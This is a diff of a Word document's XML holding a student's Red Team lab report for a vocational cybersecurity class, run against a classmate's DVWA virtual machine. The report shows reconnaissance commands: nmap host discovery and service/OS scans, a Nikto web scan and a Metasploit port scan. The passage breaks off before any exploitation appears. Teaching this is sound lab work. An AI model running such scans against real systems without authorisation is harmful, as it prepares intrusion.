--- a/EJERCICIOS DE LOS ALUMNOS/JESUS/EXAMEN-PROYECTO BLUE TEAM Y RED TEAM.docx
+++ b/EJERCICIOS DE LOS ALUMNOS/JESUS/EXAMEN-PROYECTO BLUE TEAM Y RED TEAM.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:body>
     <w:p>
       <w:pPr>
@@ -22,23 +22,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">Proyecto FP (sin laboratorio): Red Team vs Blue Team con </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>VMs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> locales</w:t>
+        <w:t>Proyecto FP (sin laboratorio): Red Team vs Blue Team con VMs locales</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -56,15 +40,7 @@
         <w:t xml:space="preserve">Nota: </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">podemos usar </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>metasploits</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> o cualquier otra herramienta</w:t>
+        <w:t>podemos usar metasploits o cualquier otra herramienta</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -85,13 +61,6 @@
       </w:r>
       <w:r>
         <w:t>Debéis hacer capturas de pantalla de todo el proceso, dividir el equipo en atacante o defensores, e incluso atacar a los otros equipos, documentarlo. Podéis usar herramientas que no hayamos visto. El fichero con la explicación y las capturas lo subís en grupo con el nombre de los participantes del grupo.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -245,30 +214,12 @@
           <w:numId w:val="3"/>
         </w:numPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Ubuntu  (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Victim</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>: servicios vulnerables)</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Ubuntu  (Victim: servicios vulnerables)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -290,15 +241,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Apache + DVWA o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>JuiceShop</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (</w:t>
+        <w:t>Apache + DVWA o JuiceShop (</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -313,64 +256,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-        </w:rPr>
-        <w:t>📌</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Con 3 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>VMs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> por grupo funciona perfecto.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t xml:space="preserve">Si quieres simplificar aún más: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">2 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>VMs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (Kali + Ubuntu víctima) y el Blue defiende desde el mismo Ubuntu (menos ideal, pero viable).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="2CAD24D4">
+        <w:pict>
           <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
@@ -438,15 +324,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Reconocimiento (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
+        <w:t>Reconocimiento (Nmap)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -468,21 +346,1029 @@
         </w:numPr>
       </w:pPr>
       <w:r>
+        <w:t>Explotación web (DVWA/JuiceShop)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Explotación web (DVWA/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>JuiceShop</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="630D4DFB">
+        <w:t>PRACTICA REALIZADA COMO RED TEAM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>Configuración del adaptador de la maquina virtual kali a adaptador puente para tenr visibilidad con los demas equipos en red.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="es-ES"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5400040" cy="3648710"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
+            <wp:docPr id="1" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="41898610" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="3648710"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Utilizamos una maquina con el sistema operativo Kali Linux como atacante.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="es-ES"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5400040" cy="3040380"/>
+            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
+            <wp:docPr id="2" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="83249596" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6" cstate="print"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="3040380"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>🟥</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> RED TEAM – PLAN DE ATAQUE COMPLETO</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Tu objetivo: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+        </w:rPr>
+        <w:t>➡️</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Conseguir acceso controlado a la máquina víctima</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+        </w:rPr>
+        <w:t>➡️</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Demostrarlo con capturas y evidencias</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+        </w:rPr>
+        <w:t>➡️</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Dejar rastro para que el Blue Team pueda detectarte</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>FASE 1 – Reconocimiento (Nmap)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>escubrir si la víctima está activa</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Ping para comprobar la respuesta de la maquina</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="es-ES"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5341287" cy="1905000"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="259860692" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="259860692" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5353066" cy="1909201"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>nmap -sn 192.168.0.0/24</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Al ser una práctica en clase no realizamos el escaneo con </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> a toda la red, y solo centramos los ataques a la IP que nos proporcionaron los compañeros.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Escaneo de puertos</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>nmap -sV -O 192.168.0.91</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="es-ES"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5400040" cy="2343150"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="2107521075" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2107521075" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="2343150"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Usamos metasploit para realizar el escaneo de puertos y ver posibles vulnerabilidades en los servicios y puertos.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="es-ES"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="3332837" cy="2257425"/>
+            <wp:effectExtent l="19050" t="0" r="913" b="0"/>
+            <wp:docPr id="1375904103" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1375904103" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3335788" cy="2259423"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="es-ES"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4657701" cy="2657475"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="297297984" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="297297984" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4664430" cy="2661314"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>IP detectada</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Puertos abiertos</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Versiones de servicios</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="es-ES"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5400040" cy="3287395"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="1926057605" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1926057605" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11" cstate="print"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="3287395"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Vemos que el puerto 80 esta abierto,(por defecto para servidor web), y lo siguiente que hicimos fue abrir un navegador para comprobar que servicio estaba corriendo, y efectivamente había un servidor web (Apache2)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>FASE 2 – Enumeración de servicios</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>HTTP (Apache + DVWA)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Código</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">nikto -h </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId12" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hipervnculo"/>
+          </w:rPr>
+          <w:t>http://192.168.0.91</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>Escaneo con Nikto</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="es-ES"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5400040" cy="1143000"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1022503875" name="Imagen 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1022503875" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="1143000"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
